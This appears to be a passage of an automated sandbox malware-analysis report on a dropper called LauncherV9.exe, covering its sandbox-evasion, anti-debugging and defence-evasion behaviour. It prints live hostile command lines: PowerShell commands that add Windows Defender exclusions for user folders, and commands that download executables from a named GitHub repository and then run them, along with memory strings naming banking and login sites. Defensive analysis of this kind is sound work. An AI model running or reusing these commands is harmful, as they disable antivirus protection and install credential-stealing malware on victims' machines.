            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\dll.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\dll.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_02E33583 rdtsc 16_2_02E33583
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5399Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4466Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5502Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4314Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5091Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4593Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4839
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4171
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 5399 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep count: 4466 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1224Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep count: 5502 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 4314 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248Thread sleep time: -14757395258967632s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep count: 5091 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep count: 4593 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8204Thread sleep time: -18446744073709540s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8216Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exe TID: 8388Thread sleep time: -150000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exe TID: 8368Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8344Thread sleep count: 4839 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8344Thread sleep count: 4171 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8392Thread sleep time: -14757395258967632s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8404Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8416Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Service.exe TID: 8756Thread sleep time: -85000s >= -30000s
            Source: C:\Users\user\AppData\Local\Service.exe TID: 8912Thread sleep time: -75000s >= -30000s
            Source: C:\Users\user\AppData\Local\Service.exe TID: 9020Thread sleep time: -65000s >= -30000s
            Source: C:\Users\user\AppData\Local\dll.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\AppData\Local\Service.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Service.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Service.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74632A334 FindFirstFileExW,0_2_00007FF74632A334
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C13160 FindFirstFileExW,22_2_00007FF621C13160
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: dll.exe, 00000010.00000003.1473827538.000000000403C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.000000000136C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400600163.000000000136C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553303136.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1573715800.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1611942390.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527895774.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527625878.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610970478.00000000011F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: &VBoxService.exe
            Source: Service.exe, 00000016.00000002.2513052311.00000261425CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: VBoxService.exe
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: jaclo.exe, 0000000D.00000002.1400014459.0000000000D48000.00000040.00000001.01000000.00000005.sdmp, dll.exe, 00000010.00000002.1611384789.0000000000519000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: ~VirtualMachineTypes
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: jaclo.exe, 0000000D.00000002.1400014459.0000000000D48000.00000040.00000001.01000000.00000005.sdmp, dll.exe, 00000010.00000002.1611384789.0000000000519000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
            Source: dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: VMWare
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: jaclo.exe, 0000000D.00000002.1400014459.0000000000D48000.00000040.00000001.01000000.00000005.sdmp, dll.exe, 00000010.00000002.1611384789.0000000000519000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
            Source: dll.exe, 00000010.00000003.1553303136.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1573715800.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527895774.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527625878.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610970478.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: dll.exe, 00000010.00000003.1473933701.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\LauncherV9.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-22221
            Source: C:\zjxbeopkqt\jaclo.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\zjxbeopkqt\jaclo.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_02E33583 rdtsc 16_2_02E33583
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BE81D0 LdrInitializeThunk,13_2_00BE81D0
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74631A42C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF74631A42C
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_02DC7F3B mov eax, dword ptr fs:[00000030h]13_2_02DC7F3B
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_02DC7C6B mov eax, dword ptr fs:[00000030h]13_2_02DC7C6B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_02E37F17 mov eax, dword ptr fs:[00000030h]16_2_02E37F17
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_02E37F19 mov eax, dword ptr fs:[00000030h]16_2_02E37F19
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_02E37C4F mov eax, dword ptr fs:[00000030h]16_2_02E37C4F
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74632BFD8 GetProcessHeap,0_2_00007FF74632BFD8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463125DC SetUnhandledExceptionFilter,0_2_00007FF7463125DC
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74631A42C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF74631A42C
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF746312438 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF746312438
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74631217C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF74631217C
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621BFCAAC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FF621BFCAAC
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C05AA8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FF621C05AA8
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621BFCC50 SetUnhandledExceptionFilter,22_2_00007FF621BFCC50
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621BFC028 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FF621BFC028

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF746303030 GetModuleFileNameW,ShellExecuteW,0_2_00007FF746303030
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\zjxbeopkqt\jaclo.exe "C:\zjxbeopkqt\jaclo.exe" Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Users\user\AppData\Local\dll.exe "C:\Users\user\AppData\Local\dll.exe" Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"Jump to behavior
            Source: C:\Users\user\Desktop\LauncherV9.exeProcess created: C:\Users\user\AppData\Local\Service.exe "C:\Users\user\AppData\Local\Service.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF746304920 GetConsoleWindow,ShowWindow,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,_Thrd_detach,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,std::_Throw_Cpp_error,0_2_00007FF746304920
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF746333BD0 cpuid 0_2_00007FF746333BD0
